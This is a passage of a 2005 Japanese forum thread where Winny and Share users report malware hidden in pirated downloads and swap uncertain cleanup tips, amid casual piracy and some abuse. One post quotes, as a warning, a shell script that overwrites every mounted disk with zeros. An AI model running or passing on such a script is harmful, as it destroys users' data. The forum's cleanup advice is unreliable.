exe本体と壁紙サイズが同じくらいだったんだが(2.28M、2.25M)、これは関係なし?
449:[名無し]さん(bin+cue).rar
05/02/13 15:57:18 nmfcKRgN0
まず流通しているノートン自体にウイルスがある場合があるので気をつけろ
無料版とかあるならそちらでまず対処するのが吉だぜ
450:[名無し]さん(bin+cue).rar
05/02/13 16:07:42 B2yAGC8p0
書庫解凍後にフォルダアイコンをダブルクリックしたらmellpoに引っかかった(*´Д`)
HDDガリガリアクセスしだしたのでタスクマネージャーでプロセス見たらmellpo.exe発見即停止
mellpoでファイル検索、program filesフォルダ内にmellpo.exeとhogehogeファイルを確認
2つのファイルは更新日時が同じでhogehogeファイルはメールボックスファイルのフルパスがリストアップしてあった(* ゚д゚)ガクブル
UpFolder.txtの変化無し
レジストでRunには変化無し、mellpoで検索1件ヒット
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICacheに発見
ノートンUpdate済みスキャンで検出無し
451:[名無し]さん(bin+cue).rar
05/02/13 16:10:31 ET6j2PhB0
質問スレから誘導されて来ました。とりあえずそのまま書き込みます。
ny関係のフォルダの中の、Upフォルダはどういう仕組みになってるのですか?
これは何だろうと見てみたら、ダウンしたこともないアダルト系の圧縮ファイルが
いーーっぱいあって驚きました。容量食うし何か分からないので全部消去しましたが
今日見てみるとまた少し溜まってました。何なのか教えて下さい。
452:[名無し]さん(bin+cue).rar
05/02/13 16:20:22 wCKpg0Qc0
>>451
質問する前にテンプレ>>1-13を熟読してください。
453:[名無し]さん(bin+cue).rar
05/02/13 16:22:45 Ntn5FObd0
>>451
テンプレが理解できなくても、ここで解説を求めないでください。
454:451
05/02/13 16:41:42 ET6j2PhB0
読んだつもりでしたが見逃していました。
同じような症状があるのですね、お騒がせしました。
455:[名無し]さん(bin+cue).rar
05/02/13 17:58:22 T1oJoBDM0
>>451
>>1の1行目から見逃すのは如何なものか
456:[名無し]さん(bin+cue).rar
05/02/13 22:36:19 S5wqXwBc0
>>451
(((;゚д゚))ガクガクブルブル
457:[名無し]さん(bin+cue).rar
05/02/13 22:58:18 JXQ6bCqx0
機転をきかして、
それが正常ですって何で言わないの?
458:[名無し]さん(bin+cue).rar
05/02/13 23:13:03 RlPSFcY40
ウィルス感染が広がったらnyのためにならないから。
459:[名無し]さん(bin+cue).rar
05/02/13 23:41:35 Cdbg4rKp0
このスレが本来の役割を果たしてないってのは、nyネットワークに
とってはいいことなんだよな。
460:[名無し]さん(bin+cue).rar
05/02/13 23:53:54 2dA3CWGr0
捏造ファイル一覧@winny
[2005-01-21] atok for linux.zip 4f3e71c955dd8bb0f47a1d122eb93396
[050121] ATOK for Linux.zip 86d2293fe5cf673356e7fd4d7f44b0fe
[2005-01-21] atok for linux.zip 760958c0955d5999d272e63879ece2a3
[2005-01-21] atok for linux.zip fccde84e559e99e2c660b5ce0c0553d3
100MB前後のものは下記掲載の全削除スクリプトが入っているので要注意!!
#!/bin/sh
# Source function library.
. /etc/rc.d/init.d/functions
aaa=$(mount | grep '^/dev/' | sort -r | awk '{print $1}')
for disk in $aaa ; do
nohup dd if=/dev/zero of=$disk bs=50000 > /dev/null 2>&1 &
done
捏造ファイル@share
[2005.01.21] ATOK for Linux.zip 9934e1679953bbf42d72c21df8cdf8afe23c6c9a
[2005.01.21] ATOK for Linux.zip 775d1e1e2cd98161087c631b4d37867ce6f856ac
461:[名無し]さん(bin+cue).rar
05/02/14 00:02:52 iUGxWps+0
ATOKぐらい買ってやれよ
今、裁判で大変なんだからさw
462:[名無し]さん(bin+cue).rar
05/02/14 00:23:33 Dz3BBZmb0
>>461
買えなくなったりしてw
463:[名無し]さん(bin+cue).rar
05/02/14 01:47:10 hAsCfGtk0
つーかWinnyを狙ってないよな
464:[名無し]さん(bin+cue).rar
05/02/14 02:02:17 F4x00gBw0
>>463
ワロス
465:ram
05/02/14 03:21:04 8HDLnSS70
【使用OS】 xp home (SP2)でした。
【WindowsUpdateしてるか】 してました。
【使用AntiVirusソフト】ノートン先生
【AntiVirusをUpdateしてるか】 してました。
【ウイルススキャンの結果】 下記参照。
【オンラインスキャンしたなら結果】下記参照。
【Winnyのバージョン】 2
【Winny歴、総DL量】 1年半・120G
【テンプレを読んだか】 読んでます。
【テンプレにある対策を実行したか】 してました。
【症状、具体的に分かる限りすべて書く】
久しぶりにPC全体にスキャンかけたら、ドキュメント&セッティングのフォルダの中の、
インターネットテンポラリの添付フォルダに、「[映画]ハウルの動く城.avi.exe」を検知した。
その日、nyを起動してたら、ノードが結構消えてたりもしていました。
【何をしたらそんなことになったのか】 ノートンで久しぶりにPC全体にスキャンをかけてみたから。
【これまでにとった措置】
ノートPCなので、OSの再インストール(上書き?[OSがHDDに内蔵されてるタイプだから・・・。])
こんな感じなのですが、まだウイルスに感染していると思いますか?
また、亜種の可能性ってありますか?
私は極窓等での判別でexeファイルなどを見つけたら開かないようにしているのですが・・・。
466:[名無し]さん(bin+cue).rar
05/02/14 03:26:22 6ib9zEpW0
>>465
その文章からそんなことわかんねーよ。テンプレ読んで死ね。
467:[名無し]さん(bin+cue).rar
05/02/14 11:34:21 InDtnOzg0
ウイルス定義ファイルに注意--シマンテック製品にウイルス感染を招く脆弱性
URLリンク(headlines.yahoo.co.jp)
先生、しっかりしろよw
468:[名無し]さん(bin+cue).rar
05/02/14 11:52:38 2obzU+Uk0
こりゃまた凄いセキュリティホールだな
実行しなくてもメール受信しただけで感染かよw
469:[名無し]さん(bin+cue).rar
05/02/14 12:25:18 hpf+qUap0
先生ッ!
470:[名無し]さん(bin+cue).rar
05/02/14 12:34:04 BlelK1f30
>>467
んなもんとっくに直ってるわい(報告してから対策まで結構時間かかったが)
471:[名無し]さん(bin+cue).rar
05/02/14 13:00:19 iUGxWps+0
>>470
この前ウィルス情報の他にプログラムパッチも来てたがそれか?
472:[名無し]さん(bin+cue).rar
05/02/14 15:32:44 ODivqBvj0
Upフォルダに大量のの冷凍ファイルと謎のオタ男の写真があったんですが
これがキン○マと呼ばれるウイルスですよね?
削除してもどんどん溜まっていくし消せない冷凍ファイルもあるしパニック(´Д⊂
nyなんてたま~にしかしないのに、いつの間に入ってきたんだろぅ。
473:[名無し]さん(bin+cue).rar
05/02/14 15:34:10 6rsj14f+0
>>468
メール受信だけでなく、ダウソファイルに仕掛けてもだろ
474:[名無し]さん(bin+cue).rar
05/02/14 16:37:14 k3sPkcst0
>>472
釣りか
475:[名無し]さん(bin+cue).rar
05/02/14 16:40:34 2obzU+Uk0
キンスマ?
聞いた事ないウイルスだな
476:[名無し]さん(bin+cue).rar
05/02/14 17:30:17 Vt81+PxZ0
>>472
(・∀・)イイ!!
477:[名無し]さん(bin+cue).rar
05/02/14 18:51:44 qf6VxUD60
キンタマファイルを閲覧しているキンタマが流れてそうだなw
478:[名無し]さん(bin+cue).rar
05/02/14 19:23:57 Emg07VCK0
ファイルの展開に「解凍」って言葉は使うのに、圧縮には「冷凍」って言葉使わないんだよな
e-wordsでも出てこないし
不思議っちゃあ不思議
479:[名無し]さん(bin+cue).rar
05/02/14 20:51:09 nql8/sVc0
なんか映画のショーンオブザデッドのファイルにウィルスがあるっぽいな。
読み込んだらギリギリいってnodeがなくなったりwinnyが立ち上がらなくなる。
…でもavi(一応wimanpで開いたら普通に見れた)にウィルスってありえないよな?
480:[名無し]さん(bin+cue).rar
05/02/14 21:38:19 JdibCrin0
>>478
正しくは
圧縮に対して伸張、パック(書庫化)に対してアンパック(展開)
前者と後者を同時に行なう場合は、冷凍と解凍(←これはスラング)
圧縮/伸張は文字通りなんだが、冷凍/解凍はアーカイブ行為に付いて言う
zipなどは、圧縮しながら書庫化(パック化)するので、本来は冷凍/解凍となる
e-wordsに書いてあるようなことは、あまり信頼できない。
481:[名無し]さん(bin+cue).rar
05/02/15 01:42:31 QjT8xRS80
なんかshareでキンタマ落としたらlzhなのに開けなくて
真空波動に落としたら音声だけの喘ぎ声が・・・外人ぽかった
なんたら病院とかいう人の
482:[名無し]さん(bin+cue).rar
05/02/15 07:46:40 j24EsbnE0
ふんふん・・・、それで?
483:[名無し]さん(bin+cue).rar
05/02/15 07:54:11 /xYGAnlj0
ファイルをうpしてないのにupfolder.txtが作られたんですけど、
0KBで何も入ってません。
これはセーフなんでしょうか?
484:[名無し]さん(bin+cue).rar
05/02/15 09:13:42 3lmXk8jY0
,ィ⊃ , -- 、
,r─-、 ,. ' / ,/ }
{ ヽ / ∠ 、___/ |
ヽ. V-─- 、 , ',_ヽ / ,'
ヽ ヾ、 ',ニ、 ヽ_/ rュ、 ゙、 /
\ l トこ,! {`-'} Y
ヽj 'ー'' ⊆) '⌒` ! K
l ヘ‐--‐ケ } 札
ヽ. ゙<‐y′ / で
(ヽ、_,.ゝ、_ ~ ___,ノ ,-、 聞
) ノ/`'ー-' < く
r'/, _.. // l、、、ヽ_) と
ゝ(_/_ノ´ /ヽ_ノ/ __,l ヽ)_)‐' い
{` ーニ[二]‐ク′ い
〉 / /_ よ
/ ´ ̄`ヽ )
(____ノ--'
485:[名無し]さん(bin+cue).rar
05/02/15 09:23:17 jiWzC0wC0
DOMは氏ね
486:[名無し]さん(bin+cue).rar
05/02/15 09:44:50 VzTczDct0
うpする人は普段から人一倍気を配って注意してる分、そう簡単に患者側にはならないよ
自分のトリでウィルスばら撒いたら信用失って即引退だしね(まあそうなっても何の損害もないけど)
487:[名無し]さん(bin+cue).rar
05/02/15 11:30:21 Yul6gg5Q0
>>479
avi .exe
だったんだろ
488:[名無し]さん(bin+cue).rar
05/02/15 11:36:54 blJKIUvI0
おれが前に踏んだexeは
avi pugera.exe
こんなかんじだった。
489:[名無し]さん(bin+cue).rar
05/02/15 11:57:46 i5pl1NiQ0
詳細表示で「種類」も表示させとけばいいんじゃないかと思うんだが。
アプリは一発で判るし。
490:[名無し]さん(bin+cue).rar
05/02/15 14:11:50 ARfTjvLW0
ウイルスバスター2005をインストールしようと思うけど、Winnyに影響でないかな~?
491:[名無し]さん(bin+cue).rar
05/02/15 15:08:22 t6NjTp7v0
>>490
スレリンク(download板:587番)
492:[名無し]さん(bin+cue).rar
05/02/15 18:12:13 c0ydgpKA0
>>490
無問題。
493:[名無し]さん(bin+cue).rar
05/02/15 19:17:19 H7+JNsOP0
>>487
いやマジだって(;´Д`)今コピペした「(映画)ショーン・オブ・ザ・デッド - Shaun Of The Dead - (字幕 by アナル男爵).avi」
みんな注意な
494:[名無し]さん(bin+cue).rar
05/02/15 19:39:59 osvcxLY30
無視リスト登録しろ
495:[名無し]さん(bin+cue).rar
05/02/15 19:44:13 hBZa0/080
>>493 ならもう少し詳しく
何で見たのか?関連付けは適切か?スペックが足りないと言う事は無いか?
レジストリエディタは立ち上がるか?タスクマネージャは?
新しくプロセス、ファイルが作られたか?レジストリの値は?
つーかハッシュは?
496:[名無し]さん(bin+cue).rar
05/02/15 19:49:05 80yD0eyp0
釣り禁止。
■━⊂( 。・_・) 彡 ガッ☆`Д´)ノ >>493
497:[名無し]さん(bin+cue).rar
05/02/15 21:27:27 8I7hEyW+0
壁紙ぬるぽウイルスは今のところ壁紙変えられてデスクトップ撮られるだけか・・・。
気持ち悪いな
win.ini検索したけどぬるぽ無し
498:[名無し]さん(bin+cue).rar
05/02/15 21:51:49 0gzfDvM/0
【使用OS】Windows Xp Home
【WindowsUpdateしてるか】最近してない
【使用AntiVirusソフト】ノートンアンチウィルス
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】b7.1
【Winny歴、総DL量】40Gくらい?
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】してない
【症状、具体的に分かる限りすべて書く】画面に「♂♀」がでてあえぎ声がする
【何をしたらそんなことになったのか】zip解凍後「偽装解除.bat」踏んでしまった
【これまでにとった措置】batファイルを踏む前にノートンでスキャンしたものの
脅威なしと出たので実行。上記の症状となりCtrl+alt+Delもきかない状態に。
再起動しても同じ状態になるためセーフモードで実行したところ、通常のような感じ
で起動したが、アプリケーションを起動すると症状発生。
499:[名無し]さん(bin+cue).rar
05/02/15 22:02:03 87AdJQuR0
>>497
撮られたデスクトップの画像はどうなるんだろう・・・?
500:[名無し]さん(bin+cue).rar
05/02/15 22:05:54 4tREr/pA0
うpフォルダに放り込まれるんじゃないの?
501:[名無し]さん(bin+cue).rar
05/02/15 22:12:56 4DsayvfH0
>>498
ギシギシアンアンって対応済みじゃなかったかなぁ~?亜種かなぁー。
batファイルをメモ帳で開いて・・・って思ったけど、batでそこまで
細かい芸当できるのかな。bat(長い空白).exeかもね。
502:[名無し]さん(bin+cue).rar
05/02/15 22:25:56 0gzfDvM/0
>>501
拡張子はbatでした
セーフモードで当該ファイルの拡張子をtxtに変更して開いて見たところ
文字化けして読めませんでした
症状が出る:ブラウザ ノートン jane msconfig
症状が出ない:メモ帳 エクスプローラー
ちなみに落としたファイルは(一般コミック・雑誌)[ジャンプ][2005-12] DEATH NOTE-58でした
503:[名無し]さん(bin+cue).rar
05/02/15 22:49:57 H6JOnBOj0
>>502
俺もそれ、踏んだ。萌える声だよな。
でも、対処法分からん。俺は再インスコした。
で、また、壁紙変わるウイルス踏んで、
今、違う事で大変なんだ。お互い頑張ろう。
504:[名無し]さん(bin+cue).rar
05/02/15 22:54:51 V5T9do2x0
>>503
ワロタ
505:[名無し]さん(bin+cue).rar
05/02/15 23:05:50 0gzfDvM/0
>>503
笑ってる場合じゃないんだけどワロタ
506:[名無し]さん(bin+cue).rar
05/02/15 23:08:24 H6JOnBOj0
俺が感染したのは、>>409に出てた奴だな。
これ、スタートアップに隠しexeファイル出すぞ?
ショートカットを削除後、
(コントロールパネルのプログラムの削除と追加から削除って出るけど、無視して良さげ)
本体である、Adobe Gamma Loader.exeも削除した方が良さそうだ。
それまで、再起動はするなよ。再起動したら、アプリが起動する。
507:ガチンコ初心
05/02/15 23:13:43 ZslCJngn0
【使用OS】Winxp pro SP1
【WindowsUpdateしてるか】昨日した
【使用AntiVirusソフト】ノートン
【AntiVirusをUpdateしてるか】今日した
【ウイルススキャンの結果】ノートンで反応なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量】三年くらい?
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】該当なし?
【症状、具体的に分かる限りすべて書く】
(一般コミック・雑誌) [ジャンプ] [2005-12] DEATH NOTE page.58 「胸中」.zip
sIdxNm06Hv
1cafd7101e4dee38d4a613c95c78c887
の中の326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された
【何をしたらそんなことになったのか】
フォルダアイコン偽装してたのでダブクリ、数十秒で気づいてPC電源断
【これまでにとった措置】
今日作成・変更された怪しいファイル(Documentのなかの~のデスクトップ.bmpとかupなんとか.txt)を削除
nyのキャッシュを全部削除
スタートアップ・レジストリなどを点検
これってなんて言うウイルスでしょうか。また駆除に必要な措置に追加があれば教えてください。
508:507
05/02/15 23:14:36 ZslCJngn0
すいません>>409でガイシュツでした(^^;
509:[名無し]さん(bin+cue).rar
05/02/15 23:20:21 BSZ5eKYk0
おまいら揃いも揃って馬鹿ばっかだな・・。
510:[名無し]さん(bin+cue).rar
05/02/15 23:21:23 0gzfDvM/0
>>509
返す言葉もございません(_ _;)…パタリ
511:[名無し]さん(bin+cue).rar
05/02/15 23:23:19 cIvE0PUr0
俺も壁紙変わる奴踏んじまった
まぁEXEと気づいたから別ドライブに移動させて、ネット切断してから開いたけど
今のところ壁紙変わるのとスクリーンショット撮られる以外不審なところはない
Upフォルダも出来てないし、単なるイタズラファイルかな?
512:[名無し]さん(bin+cue).rar
05/02/15 23:24:30 H6JOnBOj0
俺の>>506の意見は無視ばっかりだな。
513:[名無し]さん(bin+cue).rar
05/02/15 23:25:53 Bx4eUZxM0
>>502
拡張子がbatであろうと、中身はexeかcomだろ
OSに引き渡された時点で、拡張子に関係なく、実行形式であるものは実行される
Windowsなら注意すべき拡張子は
.exe .com .bat .reg .scr .url .htmなど
>>507
497参照。名称は「壁紙ぬるぽ」、melpoとの類似性あり。具体被害は壁紙変更、一部でSS流し。
今後検証してみる
514:[名無し]さん(bin+cue).rar
05/02/15 23:26:20 0gzfDvM/0
>>512
スタートアップ探したんだけどexeもショートカットも見つかりませんでした
現在adobe loaderを検索中です
515:[名無し]さん(bin+cue).rar
05/02/15 23:30:04 ZslCJngn0
>>513
どうもありがとう
516:[名無し]さん(bin+cue).rar
05/02/15 23:33:26 H6JOnBOj0
>>509
グロとかウイルスやexeをわざと押すのが俺の中の流行。
>>514
俺も同じウイルスな筈なんだが、
スタートアップフォルダが2つに増えてたぞ?
で、スタートアップにあるのは、ショートカットだよ。
Adobe Gamma Loader.exeへのショートカット。
隠しファイルを見えるようにしても見えない。
スタートからじゃないと消せない。
俺的対処法
スタートから、全てのプログラムを見る。
スタートアップのショートカットで
Adobe Gamma Loader.exeへのショートカットを見つけたら、
それを右クリックしてプロパティにて本体の場所を確認後、削除。
本体の場所に3つ、実行ファイルとか、テキストがあるので、削除。
ってやってみた。俺、バカだから確証無いよ?
517:[名無し]さん(bin+cue).rar
05/02/15 23:39:57 H6JOnBOj0
なんだか変だな。俺の真似するな。
ちょっと調べるから。
だた、スタートアップのショートカットだけは削除しとけよ~
518:[名無し]さん(bin+cue).rar
05/02/15 23:40:56 cIvE0PUr0
*.exeで検索かけたら随分前からあった形跡のある別のウイルスが発見されたorz
519:[名無し]さん(bin+cue).rar
05/02/15 23:43:02 tSpU2A7o0
私も>>507
>>506の処理一応したけど壁紙以外どういう被害あったのか不明で不安・・
520:[名無し]さん(bin+cue).rar
05/02/15 23:51:29 aRSa9gnM0
フォルダの中のexeを実行しなければ、セーフなんでしょうか?
ちなみに>507のファイルと同じです
521:[名無し]さん(bin+cue).rar
05/02/15 23:51:35 AlE8Na2/0
俺もスタートアップなんもなかったぞ。
同じのじゃないのかも。
522:[名無し]さん(bin+cue).rar
05/02/16 00:01:39 H6JOnBOj0
>>519
あったよな?
デスクトップ撮られたのも削除したし、
これで様子見しておくつもりだが。
>>520
セーフ
見るだけならセーフ。
>>521
色んなのに感染してるとか、怖い事言わないで下さい。
ノートンでスキャンして、
フォルダの中のファイルの数、合ってるか?
523:498=502=505=510=514
05/02/16 00:06:47 T5lKoGkm0
Adobe Gamma Loaderが検索しても見つかりませんでした
adobeで検索して出てくるのはadobe acrobat reader 6.0関係
nyで落としたものが別物なのかなと思って、nyのキャッシュを調べようとしたら
キャッシュフォルダが消えてる...うぅむ
524:[名無し]さん(bin+cue).rar
05/02/16 00:21:19 /i6kkWze0
ちなみに、CドライブのWINDOWSフォルダに
ぬるぽ壁紙がある。まだ懲りないの?.bmpだ。
>>523
同じやつで感染したんだけどな。
特になんともないなら、大丈夫なんじゃないかな?
俺のはPC買い換えたばかりだから、他の感染とか、
考えられないんだけど、あったかもしれないし。
一応報告までって感じだったから…。
525:[名無し]さん(bin+cue).rar
05/02/16 00:21:24 SViFvfGG0
>>522
スタートアップにありました。消しました。
けれどデスクトップをとられたものはどこにあるんですか??
本体の場所の3つのexeとかtxtは消しました
526:[名無し]さん(bin+cue).rar
05/02/16 00:23:59 /i6kkWze0
>>525
マイ ドキュメントにある筈だよ。
なんか、>>507を見ると、他にもありそうだから、確認してくれ。
俺はマイドキュメントに撮られてのが一枚あっただけだから。
俺寝るわ。おやちゅみ♥
527:[名無し]さん(bin+cue).rar
05/02/16 00:24:10 /4iS+1Vf0
Adobe Gamma Loader.exeってAdobe製品を入れたときに出来る奴じゃないの?
C:\Documents and Settings\All Users\スタート メニュー\Adobe Gamma Loader.exe
C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
でしょ?
528:[名無し]さん(bin+cue).rar
05/02/16 00:28:23 S0hy97P40
>527
ウイルスが私はウイルスですって書いてあるファイル名だとしたら
かなり、やさしいウイルスだな
529:521
05/02/16 00:31:08 E2b3+tBw0
脅かすだけのイタズラで問題なしって結論にしとく。
530:[名無し]さん(bin+cue).rar
05/02/16 00:33:19 /i6kkWze0
>>527
解凍ソフトを利用してスタートアップに
exeフォルダを隠すってウイルスがあるから、それだと思った。
アプリ自体、正規でも、それを利用されて画面を撮られたりすると思ったんだが。
俺の勘違いだったら、すまない。
実行した方は、adobe製品をコントロールパネルから削除したのち、再インコしてくれ。
それで問題は解決すると思うんだが。
531:[名無し]さん(bin+cue).rar
05/02/16 00:42:17 YcGtu7I30
>>526
ありがとうございます
マイドキュメントにありました
532:[名無し]さん(bin+cue).rar
05/02/16 01:03:23 MUkT2LHD0
このスレでさ
Winnyをよく使用しててそれでも一年ぐらいウイルスに
かかってない猛者っていないよな?
533:[名無し]さん(bin+cue).rar
05/02/16 01:06:21 l2S21LjF0
2年ほど使っているが俺は一度も感染していない。
まあ、このスレをよく見ているのおかげだが。
534:[名無し]さん(bin+cue).rar
05/02/16 01:10:52 x8e+VWk+0
>>529
遅効性だったらどうするんだ。
535:[名無し]さん(bin+cue).rar
05/02/16 01:12:43 FCU/634p0
>>507の踏んだあとウイルス検索したけど何もでないことってありますか?
536:[名無し]さん(bin+cue).rar
05/02/16 01:16:37 0Pev5+JK0
>>535
どう思いますか?
537:[名無し]さん(bin+cue).rar
05/02/16 01:17:46 KMF/Fpbn0
うちの場合は~のデスクトップ.bmpはデスクトップにできてたなあ。
あとAdobe Gamma Loaderだけど、うちはスタートアップには何もできてなかった。
検索すると、"Adobe Gamma Loader.lnkCommon Startup"ってファイルが見つかったけど
これは多分うちの場合は以前から、msconfigで
スタートアップからAdobe Gamma Loaderを消してたので、それの退避ファイル?なのかな。
そこらへんから見ると多分Adobe Gamma Loaderはシロっぽいけど。
送信パケットとか見る分には今のとこは特に悪さはしてない風だけど、
遅効性ってことはあるのはあるのかもねー、あーこわ。
538:[名無し]さん(bin+cue).rar
05/02/16 01:18:03 ABE/vpxo0
>>532
猛者って・・・感染しない奴の方が多いんじゃねーか?
539:498
05/02/16 01:27:36 T5lKoGkm0
>>530
違うウィルスなのかなぁ
>>507には「326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された」
ってなってるけど、私の場合ほぼ同名のzipファイルを解凍したら「偽装解除.bat」と
10個くらいの不明ファイルが出てきて、この「偽装解除.bat」を実行したら画面の真ん中に
「♂♀」だけ出て、あとはあえぎ声だったんです
「まだ懲りないの?.bmp」も「adobe gamma loader」も見つからないし...
540:[名無し]さん(bin+cue).rar
05/02/16 01:33:12 E2b3+tBw0
>>534
その時はその時でなんとかする。
541:[名無し]さん(bin+cue).rar
05/02/16 01:43:27 hi46Oqqx0
>>536
検索する前にexeとかを削除したんですが、
その後ウイルス検索しても何もでないけど
bmpとかは残ってるので消えてないのかなと思いました。
IDかわってるかもだけど私>>535です。
542:[名無し]さん(bin+cue).rar
05/02/16 02:05:18 UqvjmDUi0
Adobe Gamma Loader.exe
URLリンク(www.google.com)
見る限りでは何でもないファイル、もう手っ取り早くぁゃιぃプロセスと親ファイル晒せ
URLリンク(www.geocities.jp)
543:[名無し]さん(bin+cue).rar
05/02/16 02:43:19 /cUh2MQW0
ny使いかどうかは別にして、感染なんかするほうがどうかしてるぞ
544:[名無し]さん(bin+cue).rar
05/02/16 02:47:33 cNq7VYDw0
バカばっか
545:[名無し]さん(bin+cue).rar
05/02/16 02:55:48 hSSYpnE60
私も以前は引っかかる香具師は馬鹿中の馬鹿
そう思っていたのに…
昨日は天誅殺か大殺界?みたいなもんですかねw
546:[名無し]さん(bin+cue).rar
05/02/16 03:23:14 XFgx84Yk0
>>545
,j;;;;;j,. ---一、 ` ―--‐、_ l;;;;;;
{;;;;;;ゝ T辷iフ i f'辷jァ !i;;;;; ウイルスに感染する香具師は馬鹿中の馬鹿
ヾ;;;ハ ノ .::!lリ;;r゙
`Z;i 〈.,_..,. ノ;;;;;;;;> そんなふうに考えていた時期が
,;ぇハ、 、_,.ー-、_',. ,f゙: Y;;f. 俺にもありました
~''戈ヽ `二´ r'´:::. `!
547:[名無し]さん(bin+cue).rar
05/02/16 03:25:10 7kkNXfcC0
それ、流行るな
548:409
05/02/16 04:07:23 D/u62stz0
>>409です・・・
OS再インスコするとは言ったものの、時間が無くてバックアップしかしてません。
ログ読んでみるとSS保存、壁紙変更以外に活動してる様子は無いみたいですね。
SSの保存場所は多少違いがあるみたいですけど、同じexeですよね?
(俺の場合、フォルダ名をマイドキュメントから変更していたためかデスクトップに保存されてた)
実害もないことだし、取り敢えず様子見ます。
ていうか、踏んだ人意外と多いのね・・・
>>546
俺にもありました
549:[名無し]さん(bin+cue).rar
05/02/16 04:11:41 MUkT2LHD0
みなさん
今までWinnyで落としたデータやコンテンツ
を金額で換算するとどれぐらいになる?
俺は10万いったくさい
550:409
05/02/16 04:16:44 D/u62stz0
ny歴2年。
こないだまで鉄壁君だったけど、UperOOniseのファイルで
うっかりexe踏んだ。一度やってみなよ。
初回のみだけど、デスクトップのSSを撮って貰える。
ビビるだけビビって削除せずに放置することもできるし、思い切って
.exeで検索かけてしまえばわりと何も出ない。
不安ならOSクリーンインストールすればいいだけ。暇つぶしになる。
遅効性だったときのスリルとか色々あるのでマジでお勧め。
551:507
05/02/16 05:16:56 lDpPZbwW0
俺は「お気に入り」にある「Tips-Winny」フォルダに新規のUpFolder.txtがあり
そこ自身だけを指定してありました。
おそらくWinnyと名前の付いたフォルダを見つけると目クラで上書きするので
運が悪い場合のみUpFolder.txtを上書きされてしまうんだと思います。
(別のドライブにWinny2フォルダがあったけど無事)
なんとなく稚拙な新種でそう高度な事はされてない気がします。
踏んでおいてナンですがw
552:[名無し]さん(bin+cue).rar
05/02/16 06:19:56 11Ht2S4t0
Lが死んだとか聞いてあせって開こうとして踏んでしまったよ
553:[名無し]さん(bin+cue).rar
05/02/16 06:59:12 FqPnyqgM0
二つファイル落としてデスノートの「二択」と「胸中」だったんだけど
ウィルスバスター反応しないし、「二択」読んだ後だったから
安心と早く次読みたいっていうのでダブクリしちゃったんだよね。
フォルダ開いたら.Tumbがあっておかしいと思ったがその時にはもうクリックしちゃってた。
554:[名無し]さん(bin+cue).rar
05/02/16 08:09:40 0Pev5+JK0
>>552-553
だからなんだと言うんだ
555:[名無し]さん(bin+cue).rar
05/02/16 08:34:22 A4Is3sXe0
>>498
って既出のウイルス?
とりあえずC\windows\system32 の中にコピーされたと思う本体を消したらギシアンは消えたけど、アプリは起動できず。
対処法が合ったらお願いしたいのですが。
ちなみにnyで拾った友人に渡された被害者です。 _| ̄|○
556:[名無し]さん(bin+cue).rar
05/02/16 08:38:24 u99klNFJ0
だからここは質問・救済スレじゃない、と何度言ったらわかるんだー
557:[名無し]さん(bin+cue).rar
05/02/16 08:42:54 A4Is3sXe0
すまん。
どこで聞けばよいの? ウイルス関係乱立してわかんないよ(つД`)
558:[名無し]さん(bin+cue).rar
05/02/16 09:55:27 x8e+VWk+0
そのような便利なスレはございません。
セキュ板いってもAntinnyなんて相手にされんだろ。
筋から言えばその友人になんとかしてもらえ。
559:[名無し]さん(bin+cue).rar
05/02/16 10:06:04 DHKBfESF0
まあテンプレ読んで対処できないなら初期化&新規インスコだ。
自分で拾おうが友達から渡されようが、自分のマシンで自分が実行
したなら自業自得ってことだし。
560:[名無し]さん(bin+cue).rar
05/02/16 10:11:38 11Ht2S4t0
救済スレじゃなかったんだ。今知った
561:498
05/02/16 10:40:36 T5lKoGkm0
>>555
system32にあった「taskmen.exe」ってのがそうなんですかね
「作成日時:2005年2月15日13:07:44」ってなってるし
とりあえず削除してみたところ、同じようにギシアンは消えましたが
アプリケーションを起動しようとすると「ファイルを開くプログラムを選択してください」
が出てきます
\(||_ _)/ オテアゲ
562:[名無し]さん(bin+cue).rar
05/02/16 10:53:13 UR3Ruuo40
スレ進んでると思ったら・・・、何ですかこの狂態は
563:[名無し]さん(bin+cue).rar
05/02/16 11:09:08 99ye/hfF0
Whiterみたいにもっと致命的なウイルスだったら、書き込みすら
できなくて静かなんだろうがな。
564:[名無し]さん(bin+cue).rar
05/02/16 11:13:15 MISjc2zq0
>>560
だってウィルスにかからないように注意してる人たちが集まるスレだもん。
565:498
05/02/16 11:16:16 T5lKoGkm0
なまじ動くもんだから、何とかなるんじゃないかとじたばたしてます
ちなみに書き込みはサブノートから
566:498
05/02/16 11:24:43 T5lKoGkm0
taskmen.exeを削除する前
[通常起動」→windows画普通に起動し(壁紙も普通)常駐アプリが起動するときに発症
「セーフモード」→アプリケーションを起動すると発症(エクスプローラー、ノートパッドなどは発症せず)
taskmen.exeを削除したあと
アプリケーションを起動すると「ファイルを開くプログラムを選択してください」が出る
ていう感じなので、exeを実行する部分の何かが書きかえられちゃったのかな?
そのうち誰かが解析してくれるのをのんびり待つことにします
567:[名無し]さん(bin+cue).rar
05/02/16 11:41:08 fuFhnYJH0
>>566
ウイルスが何をするのかは解析されるだろうけど、復旧手順は期待
するなよ。解析の過程で副産物として出てくることはあるけどね。
関連付けがおかしくなったせいだろうから、そのへんをチェック。
568:498
05/02/16 11:59:26 T5lKoGkm0
>>567
「ファイルとexeの関連付け」はいくつかチェックしてみたけれど
特に問題なさそうでした(サブノートと比較した)
エクスプローラーは使えるので、必要なファイルとかは外付けHDDに
移せばまぁ再インストールでもしょうがないかなぁと思ってます
外付けHDDが容量厳しくなってるのでまず整理しなきゃならないので
いずれにせよしばらくはサブノートでのんびり行きます
exeが使えればDVD-Rに焼けるのになぁ
569:[名無し]さん(bin+cue).rar
05/02/16 12:26:23 B76HR7js0
フォルダ偽装は忘れたころに踏んじゃう(*´Д`)
570:[名無し]さん(bin+cue).rar
05/02/16 13:30:52 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
